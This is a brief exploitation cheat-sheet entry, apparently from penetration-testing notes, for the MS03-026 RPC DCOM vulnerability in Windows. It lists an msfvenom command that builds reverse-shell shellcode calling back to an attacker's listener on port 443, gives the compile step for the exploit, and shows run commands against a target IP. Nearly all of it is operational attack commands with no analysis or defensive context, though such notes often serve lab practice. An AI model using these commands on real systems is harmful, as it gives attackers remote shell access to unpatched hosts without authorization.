MS03-026 - RPC DCOM

Generating reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Compile the exploit with your shellcode inside

gcc ms03-026.c -o ms03-026

Run the exploit

./ms03-026 5 10.3.3.7
./ms03-026 6 10.3.3.7

Last updated